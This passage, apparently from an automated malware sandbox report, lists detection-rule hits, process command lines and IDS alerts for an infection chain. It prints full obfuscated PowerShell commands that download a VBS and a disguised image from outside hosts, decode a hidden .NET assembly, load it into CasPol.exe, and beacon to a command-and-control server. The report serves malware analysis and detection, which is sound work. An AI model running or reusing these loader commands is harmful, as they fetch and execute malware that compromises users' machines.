ZGNvbW1hbmRCeXRlcyk7MmtkdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChlQzRWQUllQzQpOzJrZHZhaU1ldGhvZC5JbnZva2UoJysnMmtkbnVsbCwgQChlQzR0eHQuRkdWR0ZSLzIyNDEvNjIuNjQuOCcrJzYxLjQwMS8vOnB0dGhlQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsJysnIGVDNENhc1BvbGVDNCwgZUM0ZGVzYXRpdmFkb2VDNCwgZUM0ZGVzYXRpdmFkb2VDNCxlQycrJzRkZXNhdGl2YWRvJysnZUM0LGVDNGRlc2F0aScrJ3ZhZG9lQzQsZUM0ZGVzYXRpdmFkb2VDNCxlQzRkZXNhdGl2YWRvZUM0LGVDNGRlc2F0aXZhZG9lQycrJzQsZUM0MWVDNCxlQzRkZXNhdGl2YWRvZUM0KSk7JykgIC1jcmVwbEFDZSAgKFtjaEFSXTExNStbY2hBUl0xMjErW2NoQVJdODYpLFtjaEFSXTEyNCAgLVJlUExBY2UgIChbY2hBUl01MCtbY2hBUl0xMDcrW2NoQVJdMTAwKSxbY2hBUl0zNiAtY3JlcGxBQ2UnZUM0JyxbY2hBUl0zOSl8IC4oKGd2ICcqTURyKicpLk5BTWVbMywxMSwyXS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnMmtkaW1hZycrJ2VVcmwgPSBlQzRodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlLycrJ2dldD9maWxla2V5PXMnKydoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtJysnZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBlQzQ7Mmtkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsya2RpbWFnZUJ5dGVzID0gMmtkd2ViQ2xpZW50LkRvdycrJ24nKydsb2FkRGF0YSgya2RpbWFnZVVybCk7MmtkaW1hZ2VUZXh0ID0gJysnW1N5c3RlbS5UZScrJ3h0LkVuY29kaW5nXTo6VVRGOC5HZXRT
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'JFM1UFpiNiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJERUZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhwSGhsTndBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRSdEdKUEJ0ZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaEFVYVRQUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjTWFReEFTWWhsSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInhaQm5VRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NzVWlPTklmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTNVBaYjY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjQ2LjI2LzE0MjIvYmVzdG9mdGhpbmdzd2l0aGVudGlyZXRpbWVnaXZlbmVic3R0aGlnbnN0b2Rvd2l0aGdyZWF0LnRJRiIsIiRFblY6QVBQREFUQVxiZXN0b2Z0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZWJzdHRoaWduc3RvZG93aXRoZy52QnMiLDAsMCk7U3RhclQtc2xFRVAoMyk7SWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGJlc3RvZnRoaW5nc3dpdGhlbnRpcmV0aW1lZ2l2ZW5lYnN0dGhpZ25zdG9kb3dpdGhnLnZCcyI='+[cHaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7492, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.cmdline", ProcessId: 7760, ProcessName: csc.exe
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7492, TargetFilename: C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'JFM1UFpiNiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJERUZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhwSGhsTndBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRSdEdKUEJ0ZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaEFVYVRQUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjTWFReEFTWWhsSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInhaQm5VRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NzVWlPTklmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTNVBaYjY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjQ2LjI2LzE0MjIvYmVzdG9mdGhpbmdzd2l0aGVudGlyZXRpbWVnaXZlbmVic3R0aGlnbnN0b2Rvd2l0aGdyZWF0LnRJRiIsIiRFblY6QVBQREFUQVxiZXN0b2Z0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZWJzdHRoaWduc3RvZG93aXRoZy52QnMiLDAsMCk7U3RhclQtc2xFRVAoMyk7SWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGJlc3RvZnRoaW5nc3dpdGhlbnRpcmV0aW1lZ2l2ZW5lYnN0dGhpZ25zdG9kb3dpdGhnLnZCcyI='+[cHaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7492, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs" , ProcessId: 7864, ProcessName: wscript.exe
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7492, TargetFilename: C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.cmdline
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'JFM1UFpiNiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJERUZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhwSGhsTndBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRSdEdKUEJ0ZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaEFVYVRQUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjTWFReEFTWWhsSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInhaQm5VRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NzVWlPTklmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTNVBaYjY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjQ2LjI2LzE0MjIvYmVzdG9mdGhpbmdzd2l0aGVudGlyZXRpbWVnaXZlbmVic3R0aGlnbnN0b2Rvd2l0aGdyZWF0LnRJRiIsIiRFblY6QVBQREFUQVxiZXN0b2Z0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZWJzdHRoaWduc3RvZG93aXRoZy52QnMiLDAsMCk7U3RhclQtc2xFRVAoMyk7SWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGJlc3RvZnRoaW5nc3dpdGhlbnRpcmV0aW1lZ2l2ZW5lYnN0dGhpZ25zdG9kb3dpdGhnLnZCcyI='+[cHaR]0x22+'))')))", CommandLine: "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'JFM1UFpiNiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJERUZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhwSGhsTndBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRSdEdKUEJ0ZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaEFVYVRQUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgI
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4

                    Data Obfuscation

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'JFM1UFpiNiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJERUZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhwSGhsTndBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRSdEdKUEJ0ZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaEFVYVRQUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjTWFReEFTWWhsSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInhaQm5VRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NzVWlPTklmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTNVBaYjY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjQ2LjI2LzE0MjIvYmVzdG9mdGhpbmdzd2l0aGVudGlyZXRpbWVnaXZlbmVic3R0aGlnbnN0b2Rvd2l0aGdyZWF0LnRJRiIsIiRFblY6QVBQREFUQVxiZXN0b2Z0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZWJzdHRoaWduc3RvZG93aXRoZy52QnMiLDAsMCk7U3RhclQtc2xFRVAoMyk7SWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGJlc3RvZnRoaW5nc3dpdGhlbnRpcmV0aW1lZ2l2ZW5lYnN0dGhpZ25zdG9kb3dpdGhnLnZCcyI='+[cHaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7492, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.cmdline", ProcessId: 7760, ProcessName: csc.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Registry Key setAuthor: Joe Security: Data: Details: F3 E4 18 5A 10 18 60 73 71 CA 92 6C CF BA 0D C7 70 A9 83 0C BC 9C E3 09 15 6B C7 E9 29 02 5F 56 C7 9C 21 5C 15 31 4B ED 6F 4A E7 05 D3 DC 23 36 C1 98 FC B2 C8 8F 6B 35 7C D7 56 AF 23 69 76 CF EB CC D5 82 B6 E3 5C 13 63 80 FA DB 2F 66 9A 8C 9E C1 D5 47 29 87 2A 94 E4 D4 42 95 06 A5 A5 56 BB 67 A5 6F BE 87 C9 AF B9 7A 8F 51 DD 2F 2F CA 76 6A , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 5480, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-EC111K\exepath
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-26T09:44:46.955074+010020204251Exploit Kit Activity Detected104.168.46.2680192.168.2.449738TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-26T09:44:46.955074+010020204241Exploit Kit Activity Detected104.168.46.2680192.168.2.449738TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-26T09:44:58.938984+010020365941Malware Command and Control Activity Detected192.168.2.449739192.169.69.2614645TCP
                    2024-11-26T09:45:10.456136+010020365941Malware Command and Control Activity Detected192.168.2.449740192.169.69.2614645TCP
                    2024-11-26T09:45:22.004452+010020365941Malware Command and Control Activity Detected192.168.2.449743192.169.69.2614645TCP
                    2024-11-26T09:45:33.642369+010020365941Malware Command and Control Activity Detected192.168.2.449769192.169.69.2614645TCP
                    2024-11-26T09:45:45.143923+010020365941Malware Command and Control Activity Detected192.168.2.449795192.169.69.2614645TCP
                    2024-11-26T09:45:56.640094+010020365941Malware Command and Control Activity Detected192.168.2.449821192.169.69.2614645TCP
                    2024-11-26T09:46:08.570874+010020365941Malware Command and Control Activity Detected192.168.2.449850192.169.69.2614645TCP
                    2024-11-26T09:46:20.192797+010020365941Malware Command and Control Activity Detected192.168.2.449876192.169.69.2614645TCP
                    2024-11-26T09:46:31.772603+010020365941Malware Command and Control Activity Detected192.168.2.449904192.169.69.2614645TCP
